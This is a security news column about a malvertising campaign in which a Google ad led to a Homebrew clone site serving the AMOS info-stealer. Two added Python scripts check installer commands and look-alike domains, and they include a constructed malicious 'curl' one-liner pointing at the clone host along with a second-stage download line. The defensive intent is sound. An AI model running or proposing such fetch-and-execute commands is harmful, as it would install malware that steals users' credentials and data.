Security Alert: The Ongoing Use of Google Ads by Hackers to Distribute Malware


DMN Security Bite is proudly sponsored by Mosyle, the sole Apple Unified Platform. We specialize in making Apple devices work-ready and secure for enterprises. Our unique approach integrates cutting-edge Apple-specific security measures for fully automated Hardening & Compliance, Next Generation EDR, AI-driven Zero Trust, and exclusive Privilege Management, all with the most advanced Apple MDM available. As a result, over 45,000 organizations trust our entirely automated Apple Unified Platform to manage millions of Apple devices effortlessly and affordably. Seize your EXTENDED TRIAL today to discover why Mosyle is your ultimate partner for Apple solutions.


Recently, it was revealed that Google is once again directing users to a malicious site as a sponsored search result. This incident marks a continuation of a troubling trend where Google Ads has inadvertently endorsed websites containing malware; the first incident dates back to 2007, involving ads for deceptive antivirus software commonly referred to as “scareware.” How is it possible that in 2025, with resources like DeepMind, Google is still susceptible to such breaches? How are cybercriminals managing to outsmart them?

This week, I intend to provide a brief overview of this alarming campaign and the methods likely employed to execute it.

Security Bite is a weekly column on DMN, where I offer insights into data privacy, discuss the latest vulnerabilities, and highlight emerging threats in Apple’s extensive ecosystem of over 2 billion active devices.


Fraudulent Homebrew ads spreading malware to Mac users

Homebrew is a popular open-source package manager for macOS and Linux, enabling users to install, update, and manage software via command line.

Ryan Chenkie alerted users on X last Saturday that Google was promoting an ad for a malicious imitation of the widely used developer tool, one that harbors malware targeting Mac and Linux users.

Typically, users can identify a fraudulent site by scrutinizing the URL. Cybercriminals often replace an “o” with a “0” or a lowercase “l” with a capital “I,” among other tricks. However, in this case, Chenkie discovered that the fake version showed Homebrew’s legitimate URL (“brew.sh”) in Google’s search results, providing no clear indicators that it was a fraudulent site. When clicked, victims were redirected to the malicious clone site (“brewe.sh”).

[Image] Fraudulent Homebrew clone exhibited as a sponsored Google ad. Image: Ryan Chenkie

On the malicious site, users were instructed to install Homebrew by inputting a command in their terminal, mimicking the official installation procedure for the authentic Homebrew. Unbeknownst to them, executing this command triggers the download and execution of malware on their Mac or Linux devices.
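The column describes the clone site handing visitors a terminal command to paste. The danger of that pattern is that the command fetches a script from whatever host the attacker chose and runs it before anyone reads it. As an added illustration (not Homebrew's installer, not code from the page or its author), the Python below lists every host a pasted one-liner, and the script it fetches once you have downloaded that script to a file, would contact, flags hosts outside an allowlist, and notes when the command shape executes the download unread. The allowlist is an assumption, the clone command and second-stage line are constructed, and the official Homebrew command is quoted as published on brew.sh at the time of writing (verify it there).

```python
"""Inspect a copy-and-paste installer one-liner before running it: list every
host it (and, once downloaded, the script it fetches) would contact, flag any
host outside an allowlist, and note when the command executes the download
with no chance to read it. Added illustration for this column, not Homebrew's
installer or any real tool; the allowlist and the clone samples are
assumptions/constructed, and the official command is quoted as published on
brew.sh at the time of writing (verify it there)."""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"()<>|;]+")

# Assumption: hosts the genuine Homebrew installer is expected to reach.
ALLOWED_HOSTS = ("brew.sh", "github.com", "raw.githubusercontent.com")


def hosts_in(text: str) -> list:
    """Unique hosts referenced by URLs in a command or script, in order found."""
    seen = []
    for url in URL_RE.findall(text):
        host = (urlsplit(url).hostname or "").lower()
        if host and host not in seen:
            seen.append(host)
    return seen


def allowed(host: str, allowlist=ALLOWED_HOSTS) -> bool:
    """Exact allowlisted host or a subdomain of one; 'brewe.sh' is neither."""
    return any(host == a or host.endswith("." + a) for a in allowlist)


def unexpected_hosts(text: str, allowlist=ALLOWED_HOSTS) -> list:
    """Hosts referenced by the text that are not on the allowlist."""
    return [h for h in hosts_in(text) if not allowed(h, allowlist)]


def executes_unread(command: str) -> bool:
    """True for the 'curl ... | bash' and bash -c "$(curl ...)" shapes, which run
    whatever the server returns before anyone can read it."""
    return bool(re.search(r"\|\s*(sudo\s+)?(ba|z)?sh\b", command)
                or re.search(r"\$\(\s*(curl|wget)\b", command))


def review_installer(command: str, script_body: str = "") -> dict:
    """Summarise what a one-liner, plus the script it fetches if supplied, would reach."""
    combined = command + "\n" + script_body
    return {"hosts": hosts_in(combined),
            "unexpected_hosts": unexpected_hosts(combined),
            "executes_unread": executes_unread(command)}


# Homebrew's published install command (as quoted on brew.sh; check the site).
OFFICIAL_CMD = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
# Constructed: the same shape pointed at the clone host named in the column.
CLONE_CMD = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
# Constructed fragment of what such a script might fetch as a second stage.
CLONE_SCRIPT = 'curl -fsSL https://updates.example.net/stage2 -o "$TMPDIR/stage2"\n'

if __name__ == "__main__":
    for label, cmd, body in [("official", OFFICIAL_CMD, ""),
                             ("clone", CLONE_CMD, CLONE_SCRIPT)]:
        print(label, review_installer(cmd, body))
```

Note that the genuine command is flagged as executing unread too; that is the point of the check. The host list is what separates the two: the official one reaches only the project's own infrastructure, while the clone reaches a look-alike host and, in its script, an unrelated one. The practical habit this encodes is to download the script to a file first, run a check like this over it, and only then execute it.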

[Image] Homebrew clone presenting a malicious installation command to the user. Image: Ryan Chenkie

The malware utilized in this incident, known as AMOS Stealer, or ‘Atomic,’ is a type of info-stealer specifically designed for macOS, available to cybercriminals as a subscription service costing $1,000 a month. Once a device is compromised, it employs scripts to extract as much user data as feasible, including iCloud Keychain passwords, credit card details, files, browser-stored crypto wallet keys, and more. AMOS then quietly transmits the stolen data back to the attackers using cURL.

Mike McQuaid, the project leader for Homebrew, shared a post on X acknowledging the situation, highlighting the project’s limited capacity to prevent further incidents. He noted that the clone site has been taken down but critiqued Google for its inadequate review procedures, stating, “There’s little we can do about this really; it keeps happening again and again, and Google seems to willingly accept money from scammers. Please help spread awareness so we can hope for a permanent solution from Google.”

For those who feel the same frustration as I do, it is perplexing how Google continues to allow these situations. This is especially concerning in light of last year’s incident where a fraudulent version of Google Authenticator, a well-established multi-factor authentication tool, was permitted as a sponsored result, endangering unsuspecting users.

Potential Techniques Employed

Similar to the App Store review process, Google Ads isn’t immune to malicious actors attempting to gain approval through underhanded methods. However, in contrast to the App Store, Google Ads heavily relies on automated systems for content review, which allows crafty hackers to exploit clever evasion tactics.

A common tactic involves registering domain names closely resembling legitimate URLs, as seen with “brewe.sh” in the recent Homebrew incident. From that point, they might initiate a “bait-and-switch” by initially submitting benign content for approval and subsequently changing it to redirect users to a malicious site once their ads are greenlit. Why do these tactics go undetected by Google? Cybercriminals often hijack Google Ads accounts that boast a clean history and sound reputation, allowing them greater leeway. This means that the legitimate URL remains visible in the search results until Google re-indexes.

While I can’t definitively assert that this was the method used in this case, past experiences suggest it’s a plausible scenario.
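Two observations above are checkable in code: the earlier paragraph on spotting look-alike URLs (“o” for “0”, lowercase “l” for capital “I”, the extra letter in “brewe.sh”), and the point just made that the legitimate URL can stay visible in the ad while the click lands elsewhere. The Python below, an added illustration for this column rather than code from Google, Homebrew or Ryan Chenkie, triages one sponsored result on both counts: it compares the displayed host with the landing host, then folds confusable characters and measures edit distance against a list of known domains. The known-host list and the sample ad pairs are constructed; the confusable map goes slightly beyond the two substitutions the text names.

```python
"""Triage one sponsored search result: does the URL shown in the ad match the
host the click lands on, and does the landing host imitate a known domain?
Added illustration for this column (not code from Google, Homebrew or Ryan
Chenkie); the known-host list and the samples below are constructed."""
from urllib.parse import urlsplit

# Characters routinely swapped for look-alikes (the column's "o" -> "0" and
# "l" -> "I" tricks, plus a few more). Each maps to one canonical character so
# that "g00gle" and "google" fold to the same string.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "i": "l", "|": "l",
                             "3": "e", "5": "s", "8": "b"})


def host_of(url: str) -> str:
    """Lowercase host of a URL or bare domain, without scheme, port, path or 'www.'."""
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower()
    return host.removeprefix("www.")


def canonical(host: str) -> str:
    """Fold confusable characters and the 'rn' -> 'm' / 'vv' -> 'w' digraphs."""
    return host.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: one inserted letter ('brewe.sh' vs 'brew.sh') costs 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str, known_hosts, max_distance: int = 1):
    """Return the known host that `host` imitates, or None.
    An exact known host is legitimate; a host that folds to the same canonical
    string, or sits within `max_distance` edits of one, is a look-alike."""
    if host in known_hosts:
        return None
    for known in known_hosts:
        a, b = canonical(host), canonical(known)
        if a == b or edit_distance(a, b) <= max_distance:
            return known
    return None


def triage(display_url: str, landing_url: str, known_hosts) -> list:
    """Findings for one ad (empty list = nothing suspicious)."""
    findings = []
    shown, landed = host_of(display_url), host_of(landing_url)
    if shown != landed:
        findings.append(f"display host {shown!r} differs from landing host {landed!r}")
    imitated = lookalike_of(landed, known_hosts)
    if imitated:
        findings.append(f"landing host {landed!r} looks like {imitated!r}")
    return findings


# Constructed allowlist of domains whose ads are worth checking.
KNOWN_HOSTS = ["brew.sh", "google.com", "github.com"]

if __name__ == "__main__":
    # Constructed samples: (URL shown in the ad, URL the click actually lands on).
    for shown, landed in [("brew.sh", "https://brewe.sh/"),
                          ("https://brew.sh", "https://brew.sh/"),
                          ("google.com", "https://g00gle.com/auth")]:
        print(f"{shown} -> {landed}: {triage(shown, landed, KNOWN_HOSTS) or 'ok'}")
```

The display-versus-landing comparison is the cheap, high-signal check: an ad whose shown URL is the real project but whose click resolves elsewhere is exactly the bait-and-switch the text describes, regardless of whether the landing host happens to resemble anything. The look-alike test is a second, fuzzier net for cases where the ad honestly shows the imitation domain; with an edit-distance budget of one it catches a single inserted, dropped or swapped character, which is the usual budget for such registrations.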

Fortunately, these types of attacks tend to be short-lived due to the reporting process associated with Google Ads. Nevertheless, even a brief exposure can lead to hundreds or thousands of infections, as Google Search is utilized by millions on a daily basis.

Always remember: trust, but verify. ✌️

Additional Updates in Apple Security

  • A significant data breach involving Gravy Analytics has reportedly exposed precise location information for millions of users of popular apps like Candy Crush, Tinder, MyFitnessPal, and others. Here’s what you need to know about this unfolding breach.
  • Washington State is initiating a lawsuit against T-Mobile stemming from a 2021 security incident that compromised the personal data of approximately 79 million individuals, including 2 million residents of Washington. Compromised data includes social security numbers, phone numbers, physical addresses, and driver’s license information, among others.
  • A new report from Check Point Research reveals details about a recent variant of the notorious Banshee stealer malware from Russian-speaking cybercriminals, which draws inspiration from Apple’s own security practices to avoid detection.
  • A vulnerability in Subaru’s security system permitted remote tracking, unlocking, and starting of millions of vehicles. A year’s worth of location history was accessible and accurate within five meters—alarming news that, while not directly related to Apple, is quite concerning.

Thank you for reading! Security Bite will return next Friday.

Follow Arin: LinkedIn, Threads, BlueSky

